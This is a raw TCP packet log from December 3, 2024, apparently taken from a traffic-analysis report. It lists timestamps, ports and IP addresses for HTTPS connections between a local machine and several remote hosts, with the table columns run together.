                                            Dec 3, 2024 09:57:03.860841990 CET49752443192.168.2.4104.26.12.205
                                            Dec 3, 2024 09:57:03.860860109 CET44349752104.26.12.205192.168.2.4
                                            Dec 3, 2024 09:57:04.474957943 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:04.477386951 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:04.477400064 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:04.477751017 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:04.480583906 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:04.480650902 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:04.480663061 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:04.532166958 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:04.642973900 CET49737443192.168.2.4172.217.21.36
                                            Dec 3, 2024 09:57:04.643004894 CET44349737172.217.21.36192.168.2.4
                                            Dec 3, 2024 09:57:04.917629004 CET49751443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:04.950676918 CET44349756173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:57:04.950958014 CET49756443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:57:04.950974941 CET44349756173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:57:04.952445984 CET44349756173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:57:04.952512980 CET49756443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:57:04.952833891 CET49756443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:57:04.952908993 CET44349756173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:57:04.952964067 CET49756443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:57:04.952970028 CET44349756173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:57:04.959342003 CET4434975120.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:05.000927925 CET49756443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:57:05.156240940 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.156270981 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.156434059 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.156451941 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.156517982 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.166906118 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.166990995 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.175513983 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.175587893 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.191135883 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.191212893 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.368345976 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.368475914 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.383913994 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.383980036 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.399394035 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.399477959 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.415080070 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.415158033 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.421258926 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.421338081 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.433247089 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.433324099 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.445126057 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.445188999 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.451297998 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.451380968 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.453262091 CET4434975120.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:05.453284979 CET4434975120.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:05.453291893 CET4434975120.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:05.453319073 CET4434975120.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:05.453335047 CET4434975120.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:05.453346014 CET4434975120.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:05.453349113 CET49751443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:05.453368902 CET4434975120.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:05.453376055 CET49751443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:05.453396082 CET49751443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:05.453414917 CET49751443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:05.460799932 CET44349756173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:57:05.460876942 CET44349756173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:57:05.460932970 CET49756443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:57:05.461721897 CET49756443192.168.2.4173.254.24.56
                                            Dec 3, 2024 09:57:05.461740971 CET44349756173.254.24.56192.168.2.4
                                            Dec 3, 2024 09:57:05.472573996 CET4434975120.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:05.472649097 CET49751443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:05.472654104 CET4434975120.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:05.472696066 CET49751443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:05.579056978 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.579135895 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.583518982 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.583589077 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.592187881 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.592287064 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.601006031 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.601064920 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.605494976 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.605551004 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.614326954 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.614389896 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.622960091 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.623033047 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.627465963 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.627548933 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.636241913 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.636298895 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.644912004 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.644963980 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.649477959 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.649590015 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.658253908 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.658317089 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.666868925 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.666939020 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.671338081 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.671438932 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.680167913 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.680234909 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.786364079 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.786412954 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.788736105 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.788810015 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.795231104 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.795280933 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.801652908 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.801708937 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.805030107 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.805079937 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.811131001 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.811182976 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.817045927 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.817101955 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.820187092 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.820255041 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.826198101 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.826253891 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.832021952 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.832072020 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.835191011 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.835283995 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.841169119 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.841233969 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.844042063 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.844096899 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.844115019 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.844189882 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.844279051 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.844279051 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:05.844299078 CET4434975491.134.10.168192.168.2.4
                                            Dec 3, 2024 09:57:05.844353914 CET49754443192.168.2.491.134.10.168
                                            Dec 3, 2024 09:57:06.884305954 CET49751443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:06.884331942 CET4434975120.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:06.884345055 CET49751443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:06.884351015 CET4434975120.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:25.110688925 CET49761443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:25.110732079 CET44349761149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:25.110816002 CET49761443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:25.111052036 CET49761443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:25.111063957 CET44349761149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:26.523632050 CET44349761149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:26.523890018 CET49761443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:26.523917913 CET44349761149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:26.524944067 CET44349761149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:26.525007963 CET49761443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:26.525975943 CET49761443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:26.526041985 CET44349761149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:26.526284933 CET49761443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:26.526292086 CET44349761149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:26.591125011 CET49761443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:27.038621902 CET44349761149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:27.038697004 CET44349761149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:27.038744926 CET49761443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:27.039238930 CET49761443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:27.039269924 CET44349761149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:27.040153027 CET49762443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:27.040190935 CET44349762149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:27.040260077 CET49762443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:27.040585995 CET49762443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:27.040596008 CET44349762149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:28.448915958 CET44349762149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:28.449290037 CET49762443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:28.449314117 CET44349762149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:28.449611902 CET44349762149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:28.449923038 CET49762443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:28.449981928 CET44349762149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:28.450063944 CET49762443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:28.491331100 CET44349762149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:29.084655046 CET44349762149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:29.084738016 CET44349762149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:29.084839106 CET49762443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:29.135945082 CET49762443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:29.135993004 CET44349762149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:29.360857964 CET49763443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:29.360882044 CET44349763149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:29.360949993 CET49763443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:29.361737013 CET49763443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:29.361748934 CET44349763149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:30.829050064 CET44349763149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:30.829289913 CET49763443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:30.829315901 CET44349763149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:30.830197096 CET44349763149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:30.830254078 CET49763443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:30.830729961 CET49763443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:30.830782890 CET44349763149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:30.830872059 CET49763443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:30.830879927 CET44349763149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:30.871396065 CET49763443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:31.366096020 CET44349763149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:31.366159916 CET44349763149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:31.366241932 CET49763443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:31.368731976 CET49763443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:31.368748903 CET44349763149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:36.956661940 CET49764443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:36.956707001 CET44349764149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:36.956785917 CET49764443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:36.957109928 CET49764443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:36.957124949 CET44349764149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:38.414819956 CET44349764149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:38.415096045 CET49764443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:38.415124893 CET44349764149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:38.415433884 CET44349764149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:38.415803909 CET49764443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:38.415864944 CET44349764149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:38.415992975 CET49764443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:38.463340998 CET44349764149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:39.035485029 CET44349764149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:39.035567045 CET44349764149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:39.035619020 CET49764443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:39.036528111 CET49764443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:39.036545992 CET44349764149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:39.042256117 CET49765443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:39.042294025 CET44349765149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:39.042356968 CET49765443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:39.042593002 CET49765443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:39.042606115 CET44349765149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:40.406522036 CET44349765149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:40.407341003 CET49765443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:40.407366037 CET44349765149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:40.407677889 CET44349765149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:40.407970905 CET49765443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:40.408023119 CET44349765149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:40.408083916 CET49765443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:40.451339006 CET44349765149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:40.919120073 CET44349765149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:40.919197083 CET44349765149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:40.919253111 CET49765443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:40.923348904 CET49765443192.168.2.4149.154.167.220
                                            Dec 3, 2024 09:57:40.923366070 CET44349765149.154.167.220192.168.2.4
                                            Dec 3, 2024 09:57:43.349349022 CET49766443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:43.349386930 CET4434976620.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:43.349447966 CET49766443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:43.349731922 CET49766443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:43.349745989 CET4434976620.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:43.509051085 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:43.509082079 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:43.509165049 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:43.509516954 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:43.509526014 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:44.906506062 CET4434976620.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:44.906594992 CET49766443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:44.910301924 CET49766443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:44.910314083 CET4434976620.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:44.910521030 CET4434976620.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:44.917608023 CET49766443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:44.959332943 CET4434976620.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:45.358788967 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:45.358881950 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:45.360824108 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:45.360835075 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:45.361049891 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:45.368316889 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:45.411334038 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:45.542417049 CET4434976620.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:45.542439938 CET4434976620.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:45.542453051 CET4434976620.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:45.542521000 CET49766443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:45.542547941 CET4434976620.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:45.542593956 CET49766443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:45.585268021 CET4434976620.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:45.585314035 CET4434976620.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:45.585349083 CET49766443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:45.585360050 CET4434976620.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:45.585376024 CET49766443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:45.585380077 CET4434976620.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:45.585422039 CET49766443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:45.585511923 CET49766443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:45.585527897 CET4434976620.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:45.585537910 CET49766443192.168.2.420.12.23.50
                                            Dec 3, 2024 09:57:45.585542917 CET4434976620.12.23.50192.168.2.4
                                            Dec 3, 2024 09:57:45.855325937 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:45.855360985 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:45.855376005 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:45.855437994 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:45.855459929 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:45.855509043 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.052223921 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.052242041 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.052308083 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.052318096 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.052361012 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.087531090 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.087547064 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.087626934 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.087632895 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.087671995 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.236732006 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.236748934 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.236834049 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.236841917 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.236882925 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.266037941 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.266053915 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.266115904 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.266123056 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.266165972 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.287543058 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.287558079 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.287612915 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.287619114 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.287657976 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.305063009 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.305078030 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.305130005 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.305135012 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.305171967 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.444720030 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.444735050 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.444828033 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.444837093 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.444876909 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.456388950 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.456403017 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.456480980 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.456484079 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.456523895 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.466552019 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.466568947 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.466624975 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.466630936 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.466665983 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.478338957 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.478354931 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.478411913 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.478418112 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.478452921 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.490027905 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.490044117 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.490145922 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.490150928 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.490204096 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.651427031 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.651448965 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.651524067 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.651535988 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.651577950 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.653848886 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.653909922 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.653913021 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.653923035 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.653950930 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.653974056 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.654016972 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.654031992 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.654042006 CET49767443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.654047012 CET4434976713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.690013885 CET49768443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:57:46.690056086 CET4434976813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:57:46.690124035 CET49768443192.168.2.413.107.246.63
